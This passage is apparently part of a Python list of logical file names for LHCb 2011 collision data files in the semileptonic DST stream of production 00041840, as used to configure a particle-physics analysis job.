'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062516_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068601_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055943_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067422_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002099_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032051_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028292_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043820_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027237_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032453_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049151_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002211_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045125_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051169_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028692_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062667_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016300_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024718_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039169_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058831_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046189_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054668_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061387_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041041_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049987_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062778_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068843_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019015_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010107_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009168_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015845_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017062_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047220_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033266_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042090_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005879_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033677_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018393_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004622_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031640_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054651_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015715_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035035_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015018_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028787_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024927_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009673_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037234_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008801_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068821_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034413_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041897_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064896_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031739_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058097_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027427_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008248_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065449_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005245_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040021_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039064_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049467_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030816_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064119_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048899_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059668_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010937_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022876_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007120_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034856_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015581_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054355_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064695_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059833_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049779_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022580_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049096_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069444_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054517_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017016_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016553_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046862_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000652_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027574_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033993_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037669_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060590_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055196_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011285_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059299_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038022_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029185_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051380_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054062_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036633_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010171_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061177_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043040_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012724_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027818_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063848_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030865_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066044_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063379_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031992_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054208_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040145_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046576_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060737_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053874_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028000_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061252_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056941_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050658_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067297_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054750_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049111_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051870_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015512_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020666_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001950_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061071_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019797_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039575_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057343_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043829_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051090_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031382_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060481_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016387_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000226_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056323_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039887_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062049_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018621_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060977_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017841_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053480_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016302_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054878_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043502_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042768_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046181_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008197_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043308_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028373_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038342_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031996_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039368_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045525_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064691_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001562_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059082_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017368_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033975_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055159_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050468_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005914_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044652_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057255_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008153_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059178_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028676_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016197_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005070_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015115_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016303_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040759_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038765_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055255_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054892_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055289_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009184_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027563_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064970_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003634_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019273_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064960_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044803_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063998_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009767_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002379_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056674_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064454_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057356_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054270_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010203_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029010_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009539_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035414_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057274_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010124_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041806_1.semileptonic.dst',
